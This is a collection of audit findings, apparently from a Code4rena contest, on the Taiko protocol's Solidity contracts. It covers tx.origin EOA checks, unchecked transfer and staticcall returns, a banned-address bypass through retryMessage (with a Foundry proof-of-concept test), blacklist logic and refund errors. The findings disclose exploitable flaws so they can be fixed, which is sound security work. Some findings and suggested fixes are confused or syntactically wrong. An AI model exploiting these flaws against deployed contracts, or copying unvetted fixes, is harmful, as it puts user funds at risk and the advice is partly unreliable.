https://github.com/code-423n4/2024-03-taiko/blob/a30b5b6afd121e4de8ceff7165a2091e62194992/packages/protocol/contracts/libs/LibAddress.sol#L77-L79

Vulnerability details

Description

Inside the function isSenderEOA(), the following check happens to ensure that the caller is an EOA:

    function isSenderEOA() internal view returns (bool) {
        return msg.sender == tx.origin;
    }

However, due the EIP-3074, this check will be redundant.

This EIP will make it possible to delegate the control of an EOA to a smart contract, rendering the check msg.sender == tx.origin useless.

This means that this check:

    function proposeBlock(
        TaikoData.State storage _state,
        TaikoData.Config memory _config,
        IAddressResolver _resolver,
        bytes calldata _data,
        bytes calldata _txList
    )
    //..
            if (!LibAddress.isSenderEOA()) revert L1_PROPOSER_NOT_EOA();
	//..

will not always hold up, which means that contracts can propose blocks which can lead to unexpected results down the line.

Tools Used

Manual Review

Recommended Mitigation Steps

Do not rely on tx.origin == msg.sender to ensure the caller is an EOA. Handle this a different way.

Assessed type

Context

ERC20 transfer return value is not checked in LibVerifying::verifyBlocks() function

Lines of code

https://github.com/code-423n4/2024-03-taiko/blob/a30b5b6afd121e4de8ceff7165a2091e62194992/packages/protocol/contracts/L1/libs/LibVerifying.sol#L189

Vulnerability details

Impact

A call to transfer without checking the results is vulnerable to incorrect accounting.If insufficient tokens are present, no revert occurs but a result of "false" is returned. So its important to check this. If you don't you could mint tokens without have received sufficient tokens to do so. So you could loose funds.

Its also a best practice to check this.

Proof of Concept

Refer to the code from verifyBlocks() function where transfer's return value is not checked.

   tko.transfer(ts.prover, bondToReturn);

Tools Used

Manual review

Recommended Mitigation Steps

Check for the return value of the transfer and if false, revert the transaction.

Assessed type

Token-Transfer

First block after genesis may never be proposed

Lines of code

https://github.com/code-423n4/2024-03-taiko/blob/main/packages/protocol/contracts/L1/libs/LibProposing.sol#L307-L316

Vulnerability details

Impact

First block after genesis will never be proposed if the same address doesn't have both proposer_one and proposer role. If proposer_one is unset (address(0)), then this block can be proposed only if proposer role is also unset, or if proposer address proposes the block which is not the purpose of this role.

Proof of Concept

https://github.com/code-423n4/2024-03-taiko/blob/main/packages/protocol/contracts/L1/libs/LibProposing.sol#L307-L316

function _isProposerPermitted(
    TaikoData.SlotB memory _slotB,
    IAddressResolver _resolver
)
    private
    view
    returns (bool)
{
    if (_slotB.numBlocks == 1) {
        // Only proposer_one can propose the first block after genesis
        address proposerOne = _resolver.resolve("proposer_one", true);
        if (proposerOne != address(0) && msg.sender != proposerOne) {
            return false;
        }
    }

    address proposer = _resolver.resolve("proposer", true);
    return proposer == address(0) || msg.sender == proposer;
}

Here if proposerOne address is correctly proposing the first block after genesis, the following condition is false:

if (proposerOne != address(0) && msg.sender != proposerOne) {

The code then checks msg.sender against proposer role. What instead should have happened was, if msg.sender is proposerOne, it should just return true.

Tools Used

Manual.

Recommended Mitigation Steps

Update the above code block to:

function _isProposerPermitted(
    TaikoData.SlotB memory _slotB,
    IAddressResolver _resolver
)
    private
    view
    returns (bool)
{
    address proposer;
    if (_slotB.numBlocks == 1) {
        // Only proposer_one can propose the first block after genesis
        proposer = _resolver.resolve("proposer_one", true);
    } else {
        proposer = _resolver.resolve("proposer", true);
    }

    return proposer == address(0) || msg.sender == proposer;
}

If the intention is to fallback on proposer role if proposerOne is set to address(0), then this should be used:

function _isProposerPermitted(
    TaikoData.SlotB memory _slotB,
    IAddressResolver _resolver
)
    private
    view
    returns (bool)
{
    if (_slotB.numBlocks == 1) {
        // Only proposer_one can propose the first block after genesis
        address proposerOne = _resolver.resolve("proposer_one", true);
-       if (proposerOne != address(0) && msg.sender != proposerOne) {
-           return false;
+       if (proposerOne != address(0)) {
+           return msg.sender == proposerOne;
        }
    }

    address proposer = _resolver.resolve("proposer", true);
    return proposer == address(0) || msg.sender == proposer;
}

Assessed type

Access Control

QA Report

See the markdown file with the details of this report here.

No way to `changeBridgedToken()` back to an old btoken

Lines of code

https://github.com/code-423n4/2024-03-taiko/blob/main/packages/protocol/contracts/tokenvault/ERC20Vault.sol#L181

Vulnerability details

Summary

Owner can call changeBridgedToken() to change the bridged token from btokenOld_ to _btokenNew. However, if later on he wants to change it back to btokenOld_ (or map btokenOld_ to another canonical _ctoken), there's no way to do so as the function call changeBridgedToken() will revert. This is because btokenOld_ has been blacklisted now with no function existent which allows whitelisting.

Vulnerability Details

Whenever changeBridgedToken() is called, it blacklists the old bridged token, btokenOld_. This coupled with the fact that there is no function inside the protocol which lets the owner remove a token from a blacklist, makes it impossible to ever call changeBridgedToken() again and set the new bridged token back as btokenOld_ since the call will always revert on L162:

  File: contracts/tokenvault/ERC20Vault.sol

  144:              /// @notice Change bridged token.
  145:              /// @param _ctoken The canonical token.
  146:              /// @param _btokenNew The new bridged token address.
  147:              /// @return btokenOld_ The old bridged token address.
  148:              function changeBridgedToken(
  149:                  CanonicalERC20 calldata _ctoken,
  150:                  address _btokenNew
  151:              )
  152:                  external
  153:                  nonReentrant
  154:                  whenNotPaused
  155:                  onlyOwner
  156:                  returns (address btokenOld_)
  157:              {
  158:                  if (_btokenNew == address(0) || bridgedToCanonical[_btokenNew].addr != address(0)) {
  159:                      revert VAULT_INVALID_NEW_BTOKEN();
  160:                  }
  161:
  162: @--->            if (btokenBlacklist[_btokenNew]) revert VAULT_BTOKEN_BLACKLISTED();
  163:
  164:                  if (IBridgedERC20(_btokenNew).owner() != owner()) {
  165:                      revert VAULT_NOT_SAME_OWNER();
  166:                  }
  167:
  168:                  btokenOld_ = canonicalToBridged[_ctoken.chainId][_ctoken.addr];
  169:
  170:                  if (btokenOld_ != address(0)) {
  171:                      CanonicalERC20 memory ctoken = bridgedToCanonical[btokenOld_];
  172:
  173:                      // The ctoken must match the saved one.
  174:                      if (
  175:                          ctoken.decimals != _ctoken.decimals
  176:                              || keccak256(bytes(ctoken.symbol)) != keccak256(bytes(_ctoken.symbol))
  177:                              || keccak256(bytes(ctoken.name)) != keccak256(bytes(_ctoken.name))
  178:                      ) revert VAULT_CTOKEN_MISMATCH();
  179:
  180:                      delete bridgedToCanonical[btokenOld_]; 
  181: @--->                btokenBlacklist[btokenOld_] = true;
  182:
  183:                      // Start the migration
  184:                      IBridgedERC20(btokenOld_).changeMigrationStatus(_btokenNew, false);
  185:                      IBridgedERC20(_btokenNew).changeMigrationStatus(btokenOld_, true);
  186:                  }

Tools Used

Manual review

Recommended Mitigation Steps

Add a function with the onlyOwner modifier which allows whiltelisting of a token if the owner wishes so. Thus the owner can call this function prior to calling changeBridgedToken() and avoid a revert.

Assessed type

Other

Relayer fee unrefunded in recallMessage()

Lines of code

https://github.com/code-423n4/2024-03-taiko/blob/b6885955903c4ec6a0d72ebb79b124c6d0a1002b/packages/protocol/contracts/bridge/Bridge.sol#L138-L139
https://github.com/code-423n4/2024-03-taiko/blob/b6885955903c4ec6a0d72ebb79b124c6d0a1002b/packages/protocol/contracts/bridge/Bridge.sol#L206

Vulnerability details

Impact

When Bridge.recallMessage() is called on a failed message on its source chain, associated asset should be released back to the original caller, but relayer fee is not considered.

So when the user indicated an interest in using a relayer and paid the associated relayer fee with the sendMessage() call, fees are not released back on recallMessage() if the message failed.

Users using relayer will lose an amount equal to _message.fee

Proof of Concept

        // value to invoke on the destination chain.
        uint256 value;
 @>>    // Processing fee for the relayer. Zero if owner will process themself.
        uint256 fee;

User initially sent value + fee

 // Ensure the sent value matches the expected amount.
        uint256 expectedAmount = _message.value + _message.fee;

refunding without considering fees

            } else {
                _message.srcOwner.sendEther(_message.value); 
            }

Tools Used

Manual review.

Recommended Mitigation Steps

            } else {
                _message.srcOwner.sendEther(_message.value + _message.fee); 
            }

Assessed type

Error

absence of an approval check before invoking the external mint function

Lines of code

https://github.com/code-423n4/2024-03-taiko/blob/a30b5b6afd121e4de8ceff7165a2091e62194992/packages/protocol/contracts/tokenvault/BridgedERC20Base.sol#L75-L86

Vulnerability details

Impact

The lack of an approval check before invoking the external mint function could result in unauthorized token creation. Without proper approval, users could have tokens minted on their behalf without their explicit consent, potentially leading to unexpected token balances and loss of user funds.

Proof of Concept

The burn function in the BridgedERC20Base contract invokes the mint function of an external contract (IBridgedERC20) without performing an approval check. This vulnerability arises from the following line of code:

IBridgedERC20(migratingAddress).mint(_account, _amount);

Here, migratingAddress represents the address of the external contract (IBridgedERC20). The function is invoked without performing any checks or validations.
In this line, the contract directly calls the mint function of IBridgedERC20 to mint tokens for a user (_account) without verifying whether the user has approved the contract to spend their tokens.
This lack of approval check means that tokens can be minted for users without their consent or explicit authorization.

Tools Used

Manual

Recommended Mitigation Steps

Implement an approval check before calling the mint function of the external contract. Before minting tokens for a user, ensure that the user has approved the contract to spend their tokens using the approve function.

Assessed type

Other

Breaking EIP-1967 pattern: Storage slot may collide unintentionally with variable storage slot, due to using direct hashed result.

Lines of code

https://github.com/code-423n4/2024-03-taiko/blob/main/packages/protocol/contracts/common/EssentialContract.sol#L17-L18
https://github.com/code-423n4/2024-03-taiko/blob/main/packages/protocol/contracts/bridge/Bridge.sol#L23-L24
https://github.com/code-423n4/2024-03-taiko/blob/main/packages/protocol/contracts/signal/SignalService.sol#L203

Vulnerability details

Impact

Storage slot may collide unintentionally with variable storage slot, due to using direct hashed result. This means that it is possible that if contracts contain certain storage slot number, the storage value will collide directly with the defined slots, leading to corrupt storage value which can easily break the protocol.

This also breaks the EIP-1967 proxy pattern that should always subtract 1 from the value (see https://eips.ethereum.org/EIPS/eip-1967).

Proof of Concept

In the Bridge.sol and EssentialContract.sol, the pre-defined storage slot locations are direct keccak256 hash values of some string. This means we know that there is a pre-image of the hash value that will create storage collision, which is the worst possible scenario for any contracts.

Even though it may be unlikely that storage variables are created to a particular storage slot number that will lead to storage collision, the fact that this storage collision problem is very critical makes this issue very severe. If we look at the standard EIP-1967 recommendation, we see that the storage slots are always keccak('some string') - 1 . The -1 serves as to ensure that there's no known pre-image, to prevent any such chance of (computable) possibility of storage collision.

Tools Used

Manual Review

Recommended Mitigation Steps

  • subtract 1 from the slot value (including in the getSignalSlot function), as implemented by EIP-1967 standard

Assessed type

Other

Banned address can still `_invokeMessageCall()` by calling `retryMessage()`

Lines of code

https://github.com/code-423n4/2024-03-taiko/blob/main/packages/protocol/contracts/bridge/Bridge.sol#L331-L332

Vulnerability details

Summary & Impact

The function banAddress() can be used by the owner to ban or unban an address. As the natspec mentions:

  File: contracts/bridge/Bridge.sol

  97:  @--->        /// @notice Ban or unban an address. A banned addresses will not be invoked upon
  98:  @--->        /// with message calls.
  99:               /// @param _addr The address to ban or unban.
  100:              /// @param _ban True if ban, false if unban.
  101:              function banAddress(

However, a user can bypass this & is able to invoke a message via retryMessage() which has no check in place for banned addresses.

Root Cause

The banned address check currently exists only within processMessage() and hence the check never occurs while retrying a message.

Details

Consider the following flow of events:

  • Alice calls processMessage() but the internal call to _invokeMessageCall() fails and the message status is set as RETRIABLE on L285.
  • Owner calls banAddress() to ban Alice's message.to address.
  • Alice calls retryMessage(). Her message gets processed and a call to _invokeMessageCall() is made since the function never checks for banned addresses. This should not have happened. Instead, it should have been directly marked DONE and the _message.value refunded.

Proof of Concept

Add the following test inside protocol/test/bridge/Bridge.t.sol and run via forge test -vv --mt test_t0x1c_Bridge_retry_message_with_banned_address to see it pass, even though it should have failed as per specs:

    function test_t0x1c_Bridge_retry_message_with_banned_address() public {
        vm.startPrank(Alice);
        (IBridge.Message memory message, bytes memory proof) =
            setUpPredefinedSuccessfulProcessMessageCall();

        // etch bad receiver at the to address, so it fails.
        vm.etch(message.to, address(badReceiver).code);

        bytes32 msgHash = destChainBridge.hashMessage(message);

        destChainBridge.processMessage(message, proof);

        IBridge.Status status = destChainBridge.messageStatus(msgHash);

        assertEq(status == IBridge.Status.RETRIABLE, true);

        // ban `message.to`
        destChainBridge.banAddress(message.to, true);

        vm.stopPrank();

        vm.prank(message.destOwner);
        destChainBridge.retryMessage(message, true); 
        IBridge.Status postRetryStatus = destChainBridge.messageStatus(msgHash);
        assertEq(postRetryStatus == IBridge.Status.FAILED, true);  // @audit : should have been marked as DONE and refund issued
    }

Tools Used

Foundry

Recommended Mitigation Steps

  • Add the banned address check inside retryMessage()
  • Issue a refund when applicable
    function retryMessage(
        Message calldata _message,
        bool _isLastAttempt
    )
        external
        nonReentrant
        whenNotPaused
        sameChain(_message.destChainId)
    {
        // If the gasLimit is set to 0 or isLastAttempt is true, the caller must
        // be the message.destOwner.
        if (_message.gasLimit == 0 || _isLastAttempt) {
            if (msg.sender != _message.destOwner) revert B_PERMISSION_DENIED();
        }

        bytes32 msgHash = hashMessage(_message);
        if (messageStatus[msgHash] != Status.RETRIABLE) {
            revert B_NON_RETRIABLE();
        }

+     if (!addressBanned[_message.to]) {
        // Attempt to invoke the messageCall.
        if (_invokeMessageCall(_message, msgHash, gasleft())) {
            _updateMessageStatus(msgHash, Status.DONE);
        } else if (_isLastAttempt) {
            _updateMessageStatus(msgHash, Status.FAILED);
        }
+     } else {
+       uint256 refundAmount = _message.value;
+       address refundTo = _message.refundTo == address(0) ? _message.destOwner : _message.refundTo;
+       _updateMessageStatus(msgHash, Status.DONE);
+       refundTo.sendEther(refundAmount);
+     }
      emit MessageRetried(msgHash);
    }

Assessed type

Invalid Validation

missed the onlyInitializing modifier in __Essential_init()

Lines of code

https://github.com/code-423n4/2024-03-taiko/blob/a30b5b6afd121e4de8ceff7165a2091e62194992/packages/protocol/contracts/common/EssentialContract.sol#L109

Vulnerability details

Impact

skipping a modifier, even if it is a calling function with initializer, may pose a threat to the system

Proof of Concept

function init(address _owner, address _addressManager) external initializer {
     __Essential_init(_owner, _addressManager);
 }
   function __Essential_init(address _owner) internal virtual {
        _transferOwnership(_owner == address(0) ? msg.sender : _owner);
        __paused = _FALSE;
    }

Tools Used

manual

Recommended Mitigation Steps

add onlyInitializing modifier

Assessed type

Upgradable

Missing return value of `staticcall` inside `RsaVerify.sol` leads to stale data

Lines of code

https://github.com/code-423n4/2024-03-taiko/blob/a30b5b6afd121e4de8ceff7165a2091e62194992/packages/protocol/contracts/automata-attestation/utils/RsaVerify.sol#L99-L110
https://github.com/code-423n4/2024-03-taiko/blob/a30b5b6afd121e4de8ceff7165a2091e62194992/packages/protocol/contracts/automata-attestation/utils/RsaVerify.sol#L247-L258

Vulnerability details

Description

In the library RsaVerify.sol, the function pkcs1Sha256 is used to verify a a PKCSv1.5 SHA256 signature:

    function pkcs1Sha256(
        bytes32 _sha256,
        bytes memory _s,
        bytes memory _e,
        bytes memory _m
    )
        internal
        view
        returns (bool)
    {
//.. code omitted
}

Another function in RsaVerify.sol, which verifies a PKCSv1.5 SHA1 signature, is the function pkcs1Sha1:

    function pkcs1Sha1(
        bytes20 _sha1,
        bytes memory _s,
        bytes memory _e,
        bytes memory _m
    )
        internal
        view
        returns (bool)
    {
//.. code omitted
}

Both these functions use the same assembly block to make a staticcall:

        assembly {
            pop(
                staticcall(
                    sub(gas(), 2000),
                    5,
                    add(input, 0x20),
                    inputlen,
                    add(decipher, 0x20),
                    decipherlen
                )
            )
        }

The gas used for the staticcall is calculated by sub(gas(), 2000).
However, if there is not enough gas left to make the static call, the execution of pkcs1Sha256() or pkcs1Sha1() will continue because there is no check for the return value of the static call being 0.

Both pkcs1Sha256 andpkcs1Sha1 are either directly or indirectly called inside:

  • SigVerifyLib.verifyRS256Signature
  • SigVerifyLib.verifyRS1Signature
  • SigVerifyLib.verifyCertificateSignature
  • SigVerifyLib.verifyAttStmtSignature

This means that signatures will be either wrongfully validated or wrongfully invalidated, which impacts the system's core workings since signature validation is one of the key building blocks of a blockchain.

Tools Used

Manual Review

Recommended Mitigation Steps

Add a check that requires the return value of the staticcall to be true.

Assessed type

Context

"Reintroduction of Previously Blacklisted Tokens via changeBridgedToken Function"

Lines of code

https://github.com/code-423n4/2024-03-taiko/blob/b6885955903c4ec6a0d72ebb79b124c6d0a1002b/packages/protocol/contracts/tokenvault/ERC20Vault.sol#L145-L200

Vulnerability details

Specifically, the vulnerability is not directly present in a single line of code but rather in the overall logic and flow of the function. The function attempts to prevent blacklisted tokens from being added by checking whether _btokenNew exists in bridgedToCanonical. However, this check is not effective if _btokenNew was part of bridgedToCanonical, got removed and blacklisted, and later its corresponding record in bridgedToCanonical[] is deleted for any reason. This scenario is not directly addressed in the function's logic, leading to the vulnerability.

Impact

The vulnerability in the changeBridgedToken function within the ERC20Vault.sol contract poses a significant risk to the security and integrity of the system. By allowing the reintroduction of previously blacklisted tokens without a comprehensive historical check, the contract owner could potentially introduce a compromised or maliciously functioning token back into the system. This could lead to unauthorized access, loss of funds, or other security breaches, undermining the trust and reliability of the system.

The vulnerability lies in the lack of a historical check against previously blacklisted addresses or deprecated contracts. The current implementation only checks if the new bridged token address is blacklisted at the time of the change. However, if a token was previously blacklisted, removed from the blacklist, and then its corresponding record in bridgedToCanonical[] is deleted, the system would not prevent its reintroduction.

Here's a conceptual demonstration of how this could be exploited:

  1. Initial Blacklisting: A token is blacklisted due to security concerns.
  2. Removal and Reintroduction: The token is removed from the blacklist and later reintroduced into the system.
  3. Exploitation: The changeBridgedToken function allows the reintroduction of the previously blacklisted token without a historical check, potentially introducing a compromised version of the token.

Tools Used

  • Solidity Compiler (0.8.24)
  • Remix IDE for Solidity

Recommended Mitigation Steps

To mitigate this vulnerability, the contract should be modified to include a comprehensive historical check against previously blacklisted addresses or deprecated contracts. This could involve maintaining a separate mapping or list that tracks the history of blacklisted tokens, ensuring that a token cannot be reintroduced without explicit approval and verification of its current status.

Here's a conceptual example of how this could be implemented:

mapping(address => bool) public tokenBlacklistHistory;

function changeBridgedToken(
    CanonicalERC20 calldata _ctoken,
    address _btokenNew
)
    external
    nonReentrant
    whenNotPaused
    onlyOwner
    returns (address btokenOld_)
{
    require(_btokenNew != address(0), "Invalid new bridged token address");
    require(!bridgedToCanonical[_btokenNew].addr != address(0), "New bridged token address already in use");
    require(!btokenBlacklist[_btokenNew], "New bridged token is blacklisted");
    require(!tokenBlacklistHistory[_btokenNew], "New bridged token was previously blacklisted");

    // Existing logic to change the bridged token...
}

This modification ensures that a previously blacklisted token cannot be reintroduced without explicit approval and verification of its current status, significantly reducing the risk of introducing a compromised token into the system.

Assessed type

Access Control

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.